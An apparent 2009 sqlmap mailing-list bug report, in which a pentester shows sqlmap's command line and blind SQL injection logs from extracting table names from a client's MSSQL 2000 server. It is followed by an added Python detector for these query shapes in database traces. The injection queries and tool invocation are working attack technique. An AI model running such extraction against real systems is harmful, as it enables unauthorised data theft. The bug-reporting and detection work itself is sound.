[sqlmap-users] Bug: Multiple result retrieval from MSSQL 2000 in Blind SQL mode fails
From: Konrads S. <ko...@sm...> - 2009-01-28 12:49:02
Hello,

While pentesting a client's solution, I discovered that sqlmap fails to retrieve multiple entries (e.g. tables).

sql> select name from client
[14:32:40] [INFO] fetching SQL SELECT statement query output: 'select name from client'
[14:32:40] [INPUT] can the SQL query provided return multiple entries? [Y/n]
[14:32:41] [INFO] query: SELECT ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32)) FROM client
[14:32:41] [INFO] retrieved: 14
[14:32:49] [INFO] performed 20 queries in 7 seconds
[14:32:49] [INPUT] the SQL query provided can return up to 14 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice: a
[14:32:51] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM client WHERE name NOT IN (SELECT TOP 0 name FROM client)
[14:32:51] [INFO] retrieved: ValidResponse1
[14:33:17] [INFO] performed 69 queries in 26 seconds
[14:33:17] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM client WHERE name NOT IN (SELECT TOP 1 name FROM client)
[14:33:17] [INFO] retrieved: ValidResponse2
...
[14:35:05] [INFO] retrieved: Restor^C
[14:35:24] [ERROR] user aborted

[*] shutting down at: 14:35:24

So far, works!

konrads@talon:~/sqlmap$ ./sqlmap.py --method="POST" --data="${DATA}" -p z4 -u "http://${IP}/${URL};jsessionid=${JSESSIONID}" --proxy="http://localhost:8080" --string="${STRING}" -s somesession --sql-shell

    sqlmap/0.6.4-rc4
    coded by Bernardo Damele A. G. <ber...@gm...>
    and Daniele Bellucci <dan...@gm...>

[*] starting at: 14:35:25

[14:35:25] [INFO] resuming ....
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, JSP
back-end DBMS: Microsoft SQL Server 2000

[14:35:26] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql>
sql> select name from sysobjects where xtype='U'
[14:36:11] [INFO] fetching SQL SELECT statement query output: 'select name from sysobjects where xtype='U''
[14:36:11] [INPUT] can the SQL query provided return multiple entries? [Y/n]
[14:36:12] [INFO] query: SELECT ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85)
[14:36:12] [INFO] retrieved: 28
[14:36:19] [INFO] performed 20 queries in 7 seconds
[14:36:19] [INPUT] the SQL query provided can return up to 28 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice: a
[14:36:21] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP 0 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:21] [INFO] retrieved:
[14:36:24] [INFO] performed 6 queries in 2 seconds
[14:36:24] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP 1 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:24] [INFO] retrieved:
[14:36:26] [INFO] performed 6 queries in 2 seconds
[14:36:26] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP 2 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:26] [INFO] retrieved:
[14:36:29] [INFO] performed 6 queries in 2 seconds
[14:36:29] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP 3 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:29] [INFO] retrieved:
[14:36:31] [INFO] performed 6 queries in 2 seconds
[14:36:31] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP 4 name FROM sysobjects WHERE xtype=CHAR(85))
[14:36:31] [INFO] retrieved: ^C
[14:36:32] [ERROR] user aborted

[*] shutting down at: 14:36:32

And so it goes on, without retrieving anything. The --tables switch fails equally. However, doing a simple select name from sysobjects works.

[14:39:52] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql> select name from sysobjects
[14:39:56] [INFO] fetching SQL SELECT statement query output: 'select name from sysobjects '
[14:39:56] [INPUT] can the SQL query provided return multiple entries? [Y/n]
[14:39:57] [INFO] query: SELECT ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32)) FROM sysobjects
[14:39:57] [INFO] retrieved: 86
[14:40:04] [INFO] performed 20 queries in 7 seconds
[14:40:04] [INPUT] the SQL query provided can return up to 86 entries. How many entries do you want to retrieve?
[a] All (default)
[#] Specific number
[q] Quit
Choice:
[14:40:06] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE name NOT IN (SELECT TOP 0 name FROM sysobjects )
[14:40:06] [INFO] retrieved: Tbl1
[14:40:22] [INFO] performed 41 queries in 15 seconds
[14:40:22] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE name NOT IN (SELECT TOP 1 name FROM sysobjects )
[14:40:22] [INFO] retrieved: Tbl2
...

--
Konrads Smelkovs
Applied IT sorcery.
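From the database side, the statements quoted in this report are exactly what a DBA would see in a SQL Server trace while a blind, row-by-row extraction is running, and the malformed double-WHERE statement is a syntax error that repeats once per row. The following is an added example (not sqlmap code and not from this thread) that flags those statement shapes over a constructed set of sample queries; the indicator names and the threshold are assumptions for illustration.

```python
import re

# Constructed sample of statements as a DBA might pull them from a SQL Server
# trace; the shapes are copied from the sqlmap output quoted in this thread.
SAMPLE_QUERIES = [
    "SELECT name FROM client WHERE id = 42",
    "SELECT ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32)) FROM sysobjects WHERE xtype=CHAR(85)",
    "SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects "
    "WHERE xtype=CHAR(85) WHERE name NOT IN (SELECT TOP 0 name FROM sysobjects WHERE xtype=CHAR(85))",
    "SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM sysobjects "
    "WHERE name NOT IN (SELECT TOP 1 name FROM sysobjects )",
    "SELECT TOP 5 name FROM sysobjects WHERE xtype = 'U'",
]

# every inferred column is wrapped as ISNULL(CAST(... AS VARCHAR(8000)), CHAR(32))
INFERENCE_WRAPPER = re.compile(r"ISNULL\(CAST\(.+? AS VARCHAR\(8000\)\), CHAR\(32\)\)", re.I)
# one row per statement: ... WHERE col NOT IN (SELECT TOP n col FROM ...)
ROW_PAGINATION = re.compile(r"\bNOT IN \(SELECT TOP \d+ ", re.I)
# string literal written as CHAR(n) so that no quote character is needed
CHAR_COMPARISON = re.compile(r"=\s*CHAR\(\d+\)", re.I)

def top_level_where_count(query):
    """Count WHERE keywords outside parentheses; a valid statement has at most one."""
    depth = count = 0
    for match in re.finditer(r"[()]|\bWHERE\b", query, re.I):
        token = match.group()
        if token == "(":
            depth += 1
        elif token == ")":
            depth -= 1
        elif depth == 0:
            count += 1
    return count

def classify(query):
    """Return the sorted list of indicator names (assumed names) the statement matches."""
    indicators = []
    if INFERENCE_WRAPPER.search(query):
        indicators.append("inference_wrapper")
    if ROW_PAGINATION.search(query):
        indicators.append("row_pagination")
    if CHAR_COMPARISON.search(query):
        indicators.append("char_comparison")
    if top_level_where_count(query) > 1:
        indicators.append("double_where")  # the malformed shape reported in this thread
    return sorted(indicators)

def scan(queries, threshold=2):
    """Return (query, indicators) pairs with at least `threshold` indicators."""
    return [(q, found) for q in queries if len(found := classify(q)) >= threshold]

if __name__ == "__main__":
    for query, found in scan(SAMPLE_QUERIES):
        print(found, "<-", query[:60])
```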